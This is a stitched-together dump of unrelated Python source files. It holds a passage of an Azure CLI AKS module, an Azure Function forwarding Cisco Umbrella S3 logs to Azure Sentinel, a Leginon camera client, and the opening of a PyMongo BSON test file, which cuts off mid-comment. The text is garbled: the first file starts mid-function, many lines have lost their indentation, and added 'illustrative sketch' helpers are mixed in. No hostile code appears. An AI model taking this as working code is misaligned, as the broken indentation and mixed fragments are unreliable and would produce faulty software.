    # validate the addition before dereferencing it below
    if addition is None:
        raise CLIError('failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
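# Illustrative sketch (not part of the original module): merging a freshly
# downloaded kubeconfig into the user's existing one under a custom context
# name. The file paths are hypothetical placeholders and must exist for the
# call to succeed.
def _example_merge_kubeconfigs():
    existing_path = os.path.join(os.path.expanduser('~'), '.kube', 'config')
    addition_path = '/tmp/new-cluster-kubeconfig.yaml'  # hypothetical path
    # replace=True silently overwrites clusters/users/contexts that share a
    # name; with replace=False the user is prompted, or a CLIError is raised
    # when no TTY is available.
    merge_kubernetes_configurations(existing_path, addition_path,
                                    replace=False, context_name='my-cluster')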
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
if not ready_nodes:
logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s', node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s', node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads('[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
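# Illustrative sketch (not part of the original module): the expected shape of
# the "--aks-custom-headers" value parsed above. The header name and value are
# hypothetical.
def _example_aks_custom_headers():
    headers = get_aks_custom_headers('CustomHeaderName=CustomHeaderValue')
    assert headers == {'CustomHeaderName': 'CustomHeaderValue'}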
|
__init__.py
|
import requests
import datetime
import logging
import boto3
import gzip
import io
import csv
import time
import os
import sys
import json
import hashlib
import hmac
import base64
from threading import Thread
from io import StringIO
import azure.functions as func
TIME_INTERVAL_MINUTES = 10
DIVIDE_TO_MULTIPLE_TABLES = True
sentinel_customer_id = os.environ.get('WorkspaceID')
sentinel_shared_key = os.environ.get('WorkspaceKey')
sentinel_log_type = 'Cisco_Umbrella'
aws_s3_bucket = os.environ.get('S3Bucket')
aws_access_key_id = os.environ.get('AWSAccessKeyId')
aws_secret_acces_key = os.environ.get('AWSSecretAccessKey')
aws_region_name = os.environ.get('AWSRegionName')
def main(mytimer: func.TimerRequest) -> None:
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Starting program')
cli = UmbrellaClient(aws_access_key_id, aws_secret_acces_key, aws_region_name, aws_s3_bucket)
ts_from, ts_to = cli.get_time_interval()
logging.info('Searching files last modified from {} to {}'.format(ts_from, ts_to))
obj_list = cli.get_files_list(ts_from, ts_to)
logging.info('Total number of files is {}. Total size is {} MB'.format(
len(obj_list),
round(sum([x['Size'] for x in obj_list]) / 10**6, 2)
))
failed_sent_events_number = 0
successfull_sent_events_number = 0
if DIVIDE_TO_MULTIPLE_TABLES:
dns_files = []
proxy_files = []
ip_files = []
cdfw_files = []
for obj in obj_list:
key = obj.get('Key', '')
if 'dnslogs' in key.lower():
dns_files.append(obj)
elif 'proxylogs' in key.lower():
proxy_files.append(obj)
elif 'iplogs' in key.lower():
ip_files.append(obj)
elif 'cloudfirewalllogs' in key.lower() or 'cdfwlogs' in key.lower():
cdfw_files.append(obj)
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_dns', queue_size=10000, bulks_number=10)
with sentinel:
for obj in dns_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_proxy', queue_size=10000, bulks_number=10)
with sentinel:
for obj in proxy_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_ip', queue_size=10000, bulks_number=10)
with sentinel:
for obj in ip_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_cloudfirewall', queue_size=10000, bulks_number=10)
with sentinel:
for obj in cdfw_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
else:
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type, queue_size=10000, bulks_number=10)
with sentinel:
for obj in obj_list:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
if failed_sent_events_number:
logging.error('{} events have not been sent'.format(failed_sent_events_number))
logging.info('Program finished. {} events have been sent. {} events have not been sent'.format(successfull_sent_events_number, failed_sent_events_number))
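# Illustrative sketch (not part of the original module): when
# DIVIDE_TO_MULTIPLE_TABLES is True, main() above routes each S3 object to a
# per-log-type custom table by looking for a substring in its key. The key
# below is a hypothetical example.
def _example_route_key_to_table(key='dnslogs/2024-01-01/2024-01-01-00-10-0000.csv.gz'):
    key = key.lower()
    if 'dnslogs' in key:
        return sentinel_log_type + '_dns'
    if 'proxylogs' in key:
        return sentinel_log_type + '_proxy'
    if 'iplogs' in key:
        return sentinel_log_type + '_ip'
    if 'cloudfirewalllogs' in key or 'cdfwlogs' in key:
        return sentinel_log_type + '_cloudfirewall'
    return sentinel_log_type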
def convert_list_to_csv_line(ls):
line = StringIO()
writer = csv.writer(line)
writer.writerow(ls)
return line.getvalue()
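# Illustrative sketch (not part of the original module): rows that do not match
# a known Umbrella schema are kept verbatim as a single CSV-formatted line.
def _example_convert_list_to_csv_line():
    # csv.writer uses the excel dialect: minimal quoting and a '\r\n' terminator.
    assert convert_list_to_csv_line(['a', 'b,c', 'd']) == 'a,"b,c",d\r\n'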
class UmbrellaClient:
def __init__(self, aws_access_key_id, aws_secret_acces_key, aws_region_name, aws_s3_bucket):
self.aws_access_key_id = aws_access_key_id
self.aws_secret_acces_key = aws_secret_acces_key
self.aws_region_name = aws_region_name
self.aws_s3_bucket = self._get_s3_bucket_name(aws_s3_bucket)
self.aws_s3_prefix = self._get_s3_prefix(aws_s3_bucket)
self.total_events = 0
self.input_date_format = '%Y-%m-%d %H:%M:%S'
self.output_date_format = '%Y-%m-%dT%H:%M:%SZ'
self.s3 = boto3.client(
's3',
aws_access_key_id=self.aws_access_key_id,
aws_secret_access_key=self.aws_secret_acces_key,
region_name=self.aws_region_name
)
def _get_s3_bucket_name(self, aws_s3_bucket):
aws_s3_bucket = self._normalize_aws_s3_bucket_string(aws_s3_bucket)
tokens = aws_s3_bucket.split('/')
aws_s3_bucket = tokens[0]
return aws_s3_bucket
def _get_s3_prefix(self, aws_s3_bucket):
aws_s3_bucket = self._normalize_aws_s3_bucket_string(aws_s3_bucket)
tokens = aws_s3_bucket.split('/')
if len(tokens) > 1:
prefix = '/'.join(tokens[1:]) + '/'
else:
prefix = ''
return prefix
def _normalize_aws_s3_bucket_string(self, aws_s3_bucket):
aws_s3_bucket = aws_s3_bucket.strip()
aws_s3_bucket = aws_s3_bucket.replace('s3://', '')
if aws_s3_bucket.startswith('/'):
aws_s3_bucket = aws_s3_bucket[1:]
if aws_s3_bucket.endswith('/'):
aws_s3_bucket = aws_s3_bucket[:-1]
return aws_s3_bucket
def get_time_interval(self):
ts_from = datetime.datetime.utcnow() - datetime.timedelta(minutes=TIME_INTERVAL_MINUTES + 1)
ts_to = datetime.datetime.utcnow() - datetime.timedelta(minutes=1)
ts_from = ts_from.replace(tzinfo=datetime.timezone.utc, second=0, microsecond=0)
ts_to = ts_to.replace(tzinfo=datetime.timezone.utc, second=0, microsecond=0)
return ts_from, ts_to
def _make_objects_list_request(self, marker='', prefix=''):
response = self.s3.list_objects(
Bucket=self.aws_s3_bucket,
Marker=marker,
Prefix=prefix
)
try:
response_code = response.get('ResponseMetadata', {}).get('HTTPStatusCode', None)
if response_code == 200:
return response
else:
raise Exception('HTTP Response Code - {}'.format(response_code))
except Exception as err:
logging.error('Error while getting objects list - {}'.format(err))
            raise
def get_files_list(self, ts_from, ts_to):
files = []
folders = ['dnslogs', 'proxylogs', 'iplogs', 'cloudfirewalllogs', 'cdfwlogs']
if self.aws_s3_prefix:
folders = [self.aws_s3_prefix + folder for folder in folders]
marker_end = (ts_from - datetime.timedelta(minutes=60)).strftime("/%Y-%m-%d/%Y-%m-%d-%H-%M")
for folder in folders:
marker = folder + marker_end
while True:
response = self._make_objects_list_request(marker=marker, prefix=folder)
for file_obj in response.get('Contents', []):
if ts_to > file_obj['LastModified'] >= ts_from:
files.append(file_obj)
if response['IsTruncated'] is True:
marker = response['Contents'][-1]['Key']
else:
break
return self.sort_files_by_date(files)
def download_obj(self, key):
logging.info('Started downloading {}'.format(key))
res = self.s3.get_object(Bucket=self.aws_s3_bucket, Key=key)
try:
response_code = res.get('ResponseMetadata', {}).get('HTTPStatusCode', None)
if response_code == 200:
body = res['Body']
data = body.read()
logging.info('File {} downloaded'.format(key))
return data
else:
logging.error('Error while getting object {}. HTTP Response Code - {}'.format(key, response_code))
except Exception as err:
logging.error('Error while getting object {} - {}'.format(key, err))
def unpack_file(self, downloaded_obj, key):
try:
file_obj = io.BytesIO(downloaded_obj)
csv_file = gzip.GzipFile(fileobj=file_obj).read().decode()
return csv_file
except Exception as err:
logging.error('Error while unpacking file {} - {}'.format(key, err))
@staticmethod
def convert_empty_string_to_null_values(d: dict):
for k, v in d.items():
if v == '' or (isinstance(v, list) and len(v) == 1 and v[0] == ''):
d[k] = None
return d
@staticmethod
def format_date(date_string, input_format, output_format):
try:
date = datetime.datetime.strptime(date_string, input_format)
date_string = date.strftime(output_format)
except Exception:
pass
return date_string
def parse_csv_ip(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 7:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Identity': row[1],
'Source IP': row[2],
'Source Port': row[3],
'Destination IP': row[4],
'Destination Port': row[5],
'Categories': row[6].split(',')
}
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'iplogs'
yield event
def parse_csv_proxy(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 21:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Identities': row[1],
'Internal IP': row[2],
'External IP': row[3],
'Destination IP': row[4],
'Content Type': row[5],
'Verdict': row[6],
'URL': row[7],
'Referer': row[8],
'userAgent': row[9],
'statusCode': row[10],
'requestSize': row[11],
'responseSize': row[12],
'responseBodySize': row[13],
'SHA-SHA256': row[14],
'Categories': row[15].split(','),
'AVDetections': row[16].split(','),
'PUAs': row[17].split(','),
'AMP Disposition': row[18],
'AMP Malware Name': row[19],
'AMP Score': row[20]
}
try:
event['Blocked Categories'] = row[21].split(',')
except IndexError:
pass
int_fields = [
'requestSize',
'responseSize',
'responseBodySize'
]
for field in int_fields:
try:
event[field] = int(event[field])
except Exception:
pass
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'proxylogs'
yield event
def parse_csv_dns(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 10:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Policy Identity': row[1],
'Identities': row[2].split(','),
'InternalIp': row[3],
'ExternalIp': row[4],
'Action': row[5],
'QueryType': row[6],
'ResponseCode': row[7],
'Domain': row[8],
'Categories': row[9].split(',')
}
try:
event['Policy Identity Type'] = row[10]
except IndexError:
pass
try:
event['Identity Types'] = row[11].split(',')
except IndexError:
pass
try:
event['Blocked Categories'] = row[12].split(',')
except IndexError:
pass
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'dnslogs'
yield event
def parse_csv_cdfw(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 14:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'originId': row[1],
'Identity': row[2],
'Identity Type': row[3],
'Direction': row[4],
'ipProtocol': row[5],
'packetSize': row[6],
'sourceIp': row[7],
'sourcePort': row[8],
'destinationIp': row[9],
'destinationPort': row[10],
'dataCenter': row[11],
'ruleId': row[12],
'verdict': row[13]
}
else:
event = {"message": convert_list_to_csv_line(row)}
event['EventType'] = 'cloudfirewalllogs'
yield event
@staticmethod
def sort_files_by_date(ls):
return sorted(ls, key=lambda k: k['LastModified'])
def process_file(self, obj, dest):
t0 = time.time()
key = obj['Key']
if 'csv.gz' in key.lower():
            downloaded_obj = self.download_obj(key)
            if downloaded_obj is None:
                # download_obj logs the error and returns None on failure
                return
            csv_file = self.unpack_file(downloaded_obj, key)
            if not csv_file:
                # unpack_file logs the error and returns None on failure
                return
parser_func = None
if 'dnslogs' in key.lower():
parser_func = self.parse_csv_dns
elif 'proxylogs' in key.lower():
parser_func = self.parse_csv_proxy
elif 'iplogs' in key.lower():
parser_func = self.parse_csv_ip
elif 'cloudfirewalllogs' in key.lower() or 'cdfwlogs' in key.lower():
parser_func = self.parse_csv_cdfw
if parser_func:
file_events = 0
for event in parser_func(csv_file):
dest.send(event)
file_events += 1
self.total_events += 1
logging.info('File processed | TIME {} sec | SIZE {} MB | Events {} | Key {}'.format(round(time.time() - t0, 2), round(obj['Size'] / 10**6, 2), file_events, key))
class AzureSentinelConnector:
def __init__(self, customer_id, shared_key, log_type, queue_size=200, bulks_number=10, queue_size_bytes=25 * (2**20)):
self.customer_id = customer_id
self.shared_key = shared_key
self.log_type = log_type
self.queue_size = queue_size
self.bulks_number = bulks_number
self.queue_size_bytes = queue_size_bytes
self._queue = []
self._bulks_list = []
self.successfull_sent_events_number = 0
self.failed_sent_events_number = 0
def send(self, event):
self._queue.append(event)
if len(self._queue) >= self.queue_size:
self.flush(force=False)
def flush(self, force=True):
self._bulks_list.append(self._queue)
if force:
self._flush_bulks()
else:
if len(self._bulks_list) >= self.bulks_number:
self._flush_bulks()
self._queue = []
def _flush_bulks(self):
jobs = []
for queue in self._bulks_list:
if queue:
queue_list = self._split_big_request(queue)
for q in queue_list:
jobs.append(Thread(target=self._post_data, args=(self.customer_id, self.shared_key, q, self.log_type, )))
for job in jobs:
job.start()
for job in jobs:
job.join()
self._bulks_list = []
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
self.flush()
def _build_signature(self, customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id, encoded_hash)
return authorization
def _post_data(self, customer_id, shared_key, body, log_type):
events_number = len(body)
body = json.dumps(body)
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self._build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
uri = 'https://' + customer_id + '.ods.opinsights.azure.com' + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
response = requests.post(uri, data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
logging.info('{} events have been successfully sent to Azure Sentinel'.format(events_number))
self.successfull_sent_events_number += events_number
else:
logging.error("Error during sending events to Azure Sentinel. Response code: {}".format(response.status_code))
self.failed_sent_events_number += events_number
def _check_size(self, queue):
data_bytes_len = len(json.dumps(queue).encode())
return data_bytes_len < self.queue_size_bytes
def _split_big_request(self, queue):
if self._check_size(queue):
return [queue]
else:
middle = int(len(queue) / 2)
queues_list = [queue[:middle], queue[middle:]]
return self._split_big_request(queues_list[0]) + self._split_big_request(queues_list[1])
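# Illustrative sketch (not part of the original module): typical use of the
# connector defined above. Events are queued by send(), grouped into bulks and
# posted to the Log Analytics Data Collector API ('/api/logs'), each request
# signed with the HMAC-SHA256 SharedKey header built in _build_signature. The
# workspace id and key below are placeholders, so this only runs against a
# real workspace.
def _example_send_events():
    connector = AzureSentinelConnector(
        customer_id='00000000-0000-0000-0000-000000000000',  # placeholder workspace id
        shared_key='<base64-encoded-workspace-key>',  # placeholder shared key
        log_type='Cisco_Umbrella_dns')
    with connector:
        connector.send({'Domain': 'example.com', 'Action': 'Allowed'})
    # __exit__ calls flush(), which posts any events still in the queue.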
|
cameraclient.py
|
from leginon import leginondata
import threading
import time
# Change this to False to avoid automated screen lifting
AUTO_SCREEN_UP = True
AUTO_COLUMN_VALVE_OPEN = True
default_settings = leginondata.CameraSettingsData()
default_settings['dimension'] = {'x': 1024, 'y': 1024}
default_settings['offset'] = {'x': 0, 'y': 0}
default_settings['binning'] = {'x': 1, 'y': 1}
default_settings['exposure time'] = 200
default_settings['save frames'] = False
default_settings['frame time'] = 200
default_settings['align frames'] = False
default_settings['align filter'] = 'None'
default_settings['use frames'] = ''
default_settings['readout delay'] = 0
class CameraClient(object):
def __init__(self):
self.exposure_start_event = threading.Event()
self.exposure_done_event = threading.Event()
self.readout_done_event = threading.Event()
self.position_camera_done_event = threading.Event()
def clearCameraEvents(self):
self.exposure_start_event.clear()
self.exposure_done_event.clear()
self.readout_done_event.clear()
self.position_camera_done_event.clear()
def waitExposureDone(self):
self.exposure_done_event.wait()
def waitReadoutDone(self):
self.readout_done_event.wait()
def waitPositionCameraDone(self):
self.position_camera_done_event.wait()
def startExposureTimer(self):
'''
We want to approximate when the CCD exposure is done,
but not wait for the readout, which can take a lot longer.
This will set a timer that will generate an event when
we think the exposure should be done.
'''
extratime = 1.0
self.logger.debug('Extra time for exposure: %s (tune this lower to save time)' % (extratime,))
exposure_seconds = self.instrument.ccdcamera.ExposureTime / 1000.0
waittime = exposure_seconds + extratime
t = threading.Timer(waittime, self.exposure_done_event.set)
self.exposure_start_event.set()
t.start()
def positionCamera(self,camera_name=None, allow_retracted=False):
'''
Position the camera ready for acquisition
'''
orig_camera_name = self.instrument.getCCDCameraName()
if camera_name is not None:
self.instrument.setCCDCamera(camera_name)
		hosts = list(map((lambda x: self.instrument.ccdcameras[x].Hostname), self.instrument.ccdcameras.keys()))
		## Retract cameras that are above this one (higher zplane), or that are
		## on the same host but lower, because the host often retracts the
		## others regardless of position without including that in the timing,
		## which often results in a blank image.
for name,cam in self.instrument.ccdcameras.items():
if cam.Zplane > self.instrument.ccdcamera.Zplane or (hosts.count(cam.Hostname) > 1 and cam.Zplane < self.instrument.ccdcamera.Zplane):
try:
if cam.Inserted:
cam.Inserted = False
self.logger.info('retracted camera: %s' % (name,))
except:
pass
## insert the current camera, unless allow_retracted
if not allow_retracted:
try:
inserted = self.instrument.ccdcamera.Inserted
except:
inserted = True
if not inserted:
camname = self.instrument.getCCDCameraName()
self.logger.info('inserting camera: %s' % (camname,))
self.instrument.ccdcamera.Inserted = True
if camera_name is not None:
# set current camera back in case of side effect
self.instrument.setCCDCamera(orig_camera_name)
self.position_camera_done_event.set()
def liftScreenBeforeExposure(self,exposure_type='normal'):
'''
		Lift main screen if it is down for non-dark exposure
'''
if exposure_type == 'dark':
# Do not do anything if a dark image is about to be acquired
return
try:
state = self.instrument.tem.MainScreenPosition
except:
state = 'down'
pass
if state != 'up':
self.logger.info('Lifting screen for camera exposure....')
self.instrument.tem.MainScreenPosition = 'up'
def openColumnValveBeforeExposure(self,exposure_type='normal'):
'''
Open Column Valve if it is closed for non-dark exposure
'''
if exposure_type == 'dark':
# Do not do anything if a dark image is about to be acquired
return
try:
state = self.instrument.tem.ColumnValvePosition
except:
state = 'closed'
pass
if state != 'open':
self.logger.info('Open Column Valve for camera exposure....')
self.instrument.tem.ColumnValvePosition = 'open'
def dummy(self):
pass
def prepareToAcquire(self,allow_retracted=False,exposure_type='normal'):
		# Pass the callables (not their return values) to Thread so the three
		# preparation steps actually run concurrently; previously the functions
		# were called serially and the threads were never started.
		t1 = threading.Thread(target=self.positionCamera, kwargs={'allow_retracted': allow_retracted})
		if AUTO_SCREEN_UP:
			t2 = threading.Thread(target=self.liftScreenBeforeExposure, args=(exposure_type,))
		else:
			t2 = threading.Thread(target=self.dummy)
		if AUTO_COLUMN_VALVE_OPEN:
			t3 = threading.Thread(target=self.openColumnValveBeforeExposure, args=(exposure_type,))
		else:
			t3 = threading.Thread(target=self.dummy)
		for t in (t1, t2, t3):
			t.start()
		while t1.isAlive() or t2.isAlive() or t3.isAlive():
			time.sleep(0.5)
def acquireCameraImageData(self, scopeclass=leginondata.ScopeEMData, allow_retracted=False, type='normal'):
'''Acquire a raw image from the currently configured CCD camera'''
self.prepareToAcquire(allow_retracted,exposure_type=type)
## set type to normal or dark
self.instrument.ccdcamera.ExposureType = type
imagedata = leginondata.CameraImageData()
imagedata['session'] = self.session
## make sure shutter override is activated
try:
self.instrument.tem.ShutterControl = True
except:
# maybe tem has no such function
pass
## acquire image, get new scope/camera params
try:
scopedata = self.instrument.getData(scopeclass)
except:
raise
#cameradata_before = self.instrument.getData(leginondata.CameraEMData)
imagedata['scope'] = scopedata
self.startExposureTimer()
imagedata['image'] = self.instrument.ccdcamera.Image
cameradata_after = self.instrument.getData(leginondata.CameraEMData)
## only using cameradata_after, not cameradata_before
imagedata['camera'] = cameradata_after
## duplicating 'use frames' here because we may reuse same
## CameraEMData for multiple versions of AcquisitionImageData
imagedata['use frames'] = cameradata_after['use frames']
self.readout_done_event.set()
return imagedata
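# Illustrative sketch (not part of the original module): the timer pattern used
# by startExposureTimer above -- signal "exposure done" after the exposure time
# plus a small margin instead of waiting for the much slower camera readout.
# The default values are hypothetical.
def _example_exposure_timer(exposure_ms=200, extratime=1.0):
	done = threading.Event()
	timer = threading.Timer(exposure_ms / 1000.0 + extratime, done.set)
	timer.start()
	done.wait()
	return done.is_set()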
|
test_bson.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the bson module."""
import array
import collections
import datetime
import mmap
import os
import pickle
import re
import sys
import tempfile
import uuid
from collections import OrderedDict, abc
from io import BytesIO
sys.path[0:0] = [""]
from test import qcheck, unittest
from test.utils import ExceptionCatchingThread
import bson
from bson import (
BSON,
EPOCH_AWARE,
Regex,
decode,
decode_all,
decode_file_iter,
decode_iter,
encode,
is_valid,
)
from bson.binary import Binary, UuidRepresentation
from bson.code import Code
from bson.codec_options import CodecOptions
from bson.dbref import DBRef
from bson.errors import InvalidBSON, InvalidDocument
from bson.int64 import Int64
from bson.max_key import MaxKey
from bson.min_key import MinKey
from bson.objectid import ObjectId
from bson.son import SON
from bson.timestamp import Timestamp
from bson.tz_util import FixedOffset, utc
class NotADict(abc.MutableMapping):
"""Non-dict type that implements the mapping protocol."""
def __init__(self, initial=None):
if not initial:
self._dict = {}
else:
self._dict = initial
def __iter__(self):
return iter(self._dict)
def __getitem__(self, item):
return self._dict[item]
def __delitem__(self, item):
del self._dict[item]
def __setitem__(self, item, value):
self._dict[item] = value
def __len__(self):
return len(self._dict)
def __eq__(self, other):
if isinstance(other, abc.Mapping):
return all(self.get(k) == other.get(k) for k in self)
return NotImplemented
def __repr__(self):
return "NotADict(%s)" % repr(self._dict)
class DSTAwareTimezone(datetime.tzinfo):
def __init__(self, offset, name, dst_start_month, dst_end_month):
self.__offset = offset
self.__dst_start_month = dst_start_month
self.__dst_end_month = dst_end_month
self.__name = name
def _is_dst(self, dt):
return self.__dst_start_month <= dt.month <= self.__dst_end_month
def utcoffset(self, dt):
return datetime.timedelta(minutes=self.__offset) + self.dst(dt)
def dst(self, dt):
if self._is_dst(dt):
return datetime.timedelta(hours=1)
return datetime.timedelta(0)
def tzname(self, dt):
return self.__name
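# Illustrative sketch (not part of the original test module): how the
# DSTAwareTimezone above reports offsets in and out of its DST window
# (months 4..7 in this configuration).
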